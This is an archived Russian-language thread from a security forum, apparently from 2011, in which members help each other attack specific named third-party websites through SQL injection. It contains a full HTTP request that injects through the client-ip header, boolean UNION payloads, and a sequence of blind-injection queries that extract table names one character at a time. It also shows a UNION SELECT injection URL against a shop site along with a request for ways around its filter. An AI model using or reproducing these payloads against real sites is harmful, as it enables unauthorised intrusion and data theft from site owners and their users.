HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.06.2011, 19:38
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Цитата:
Сообщение от None  
SELECT id, date FROM post ORDER BY date desc LIMIT 1,
$inj
Что-нибудь было придумано для решения SQL-инжекций в таких запросах?

UNION SELECT использовать соответсвенно не дает (Incorrect usage of UNION and ORDER BY).
 
Ответить с цитированием

  #2  
Старый 02.06.2011, 21:29
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

/showthread.php?t=56446
 
Ответить с цитированием

  #3  
Старый 02.06.2011, 21:41
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

/showpost.php?p=535989&postcount=4

>24.12.2007, 20:40

Вот я и спрашиваю, а изменилось ли что-нибудь?
 
Ответить с цитированием

  #4  
Старый 03.06.2011, 05:03
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

вот ссылка

Цитата:
Сообщение от None  
http://ttic.ru/counter/
в header вписывая client-ip: 1' выходит скуля

Но при раскручивании ничего не выявляет и не показывает!

Помогите плз!
 
Ответить с цитированием

  #5  
Старый 03.06.2011, 05:27
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от Faaax  
Faaax said:
в header вписывая client-ip: 1' выходит скуля
У меня ничего не выходит. Напиши HTTP-запрос и ответ, в котором ты нашел уязвимость.

Раскрытие пути - http://ttic.ru/modules/counter/mod.php
 
Ответить с цитированием

  #6  
Старый 03.06.2011, 05:41
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

Код:
Code:
Host: ttic.ru
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
DNT: 1
Cookie: PHPSESSID=b6304a7231ca8359ec09f27330a48932
Connection: keep-alive
Cache-Control: max-age=0
client-ip: 1'
через дополнение mozilla live http replay
 
Ответить с цитированием

  #7  
Старый 03.06.2011, 06:24
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Очень интересная инъекция. Один из вариантов решения:

client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='1 - true ("You have been banned")

client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='2 - false (страница без изменений)
 
Ответить с цитированием

  #8  
Старый 03.06.2011, 06:30
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

вот и я о том же,этот запрос я тоже пробовал,что меня и огорчило!
 
Ответить с цитированием

  #9  
Старый 03.06.2011, 06:40
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от Faaax  
Faaax said:
вот и я о том же,этот запрос я тоже пробовал,что меня и огорчило!
Тут нечему огорчаться. Пиши скрипт и выводи все, что хочешь =)

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>128 and '1'='1 нет

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>64 and '1'='1 да

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>96 and '1'='1 нет

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>80 and '1'='1 да

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>88 and '1'='1 нет

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>84 and '1'='1 да

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>86 and '1'='1 нет

client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>85 and '1'='1 нет

Код первого символа - 85
 
Ответить с цитированием

  #10  
Старый 03.06.2011, 07:07
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

M_cript

спасибо за помощь

есть ещё вопросик

есть скуля,но в ней фильтруется и and и union

Код:
Code:
http://www.shoptop.ru/sitemap.html?lim1=8250%27%20&&%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56%20#
как обойти фильтрацию union select?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ